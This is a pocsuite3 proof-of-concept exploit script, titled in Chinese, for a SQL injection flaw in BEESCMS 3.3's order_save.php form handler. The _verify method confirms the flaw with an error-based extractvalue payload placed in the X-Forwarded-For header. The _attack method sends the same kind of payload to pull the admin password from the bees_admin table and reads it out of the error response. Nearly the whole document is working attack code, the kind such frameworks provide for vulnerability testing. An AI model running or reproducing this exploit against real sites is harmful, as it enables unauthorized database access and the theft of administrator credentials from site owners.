BEESCMS 3.3 /order_save.php SQL注入漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ import re from pocsuite3.api import Output, POCBase, register_poc, requests class DemoPOC(POCBase): vulID = '1261' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-04-28' createDate = '2014-05-05' updateDate = '2014-05-05' references = ['http://wooyun.org/bugs/wooyun-2014-058601'] name = 'BEESCMS 3.3 /order_save.php SQL注入漏洞 POC' appPowerLink = 'http://www.beescms.com/' appName = 'BEESCMS' appVersion = '3.3#' vulType = 'SQL Injection' desc = ''' BEESCMS 3.4最新版,SQL注入漏洞,可注出admin密码,3.4版本表单存在验证码,无法使用此poc. ''' samples = [] install_requires = [''] def _verify(self): result = {} product_url = self.url + '/mx_form/order_save.php' post_data = 'form_id=5&fields%5Bmail%5D=&fields%5Busername%5D=1' \ '&fields%5Btel%5D=1&fields%5Bweb_contact%5D=1' \ '&fields%5Baddress%5D=1&fields%5Bcontent%5D=1' \ '&lang=cn&f_id=22&submit=%E6%8F%90%E4%BA%A4' headers_fake = {} headers_fake['X-Forwarded-For'] = "8.8.8.8',extractvalue'\ '(1,conCat(0x24, (sEleCt md5(3.1416)))),'22') -- #" r = requests.post(product_url, data=post_data, headers=headers_fake) if '8b3ed8ed86db2ef2cd728' in r.text: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = product_url return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): product_url = self.url + '/mx_form/order_save.php' result = {} headers_fake = {} post_data = 'form_id=5&fields%5Bmail%5D=&fields%5Busername%5D=1' \ '&fields%5Btel%5D=1&fields%5Bweb_contact%5D=1' \ '&fields%5Baddress%5D=1&fields%5Bcontent%5D=1' \ '&lang=cn&f_id=22&submit=%E6%8F%90%E4%BA%A4' headers_fake['X-Forwarded-For'] = "8.8.8.8',extractvalue'\ '(1,conCat(0x24, (sEleCt admin_password FrOm `bees_admin`))),'22') -- #" r = requests.post(product_url, data=post_data, headers=headers_fake) content = r.text match = re.search("syntax error: '(.*?)'", content) if match: result['AdminInfo'] = {} result['AdminInfo']['Password'] = match.group(1) return self.parse_output(result) def _shell(self): pass register_poc(DemoPOC)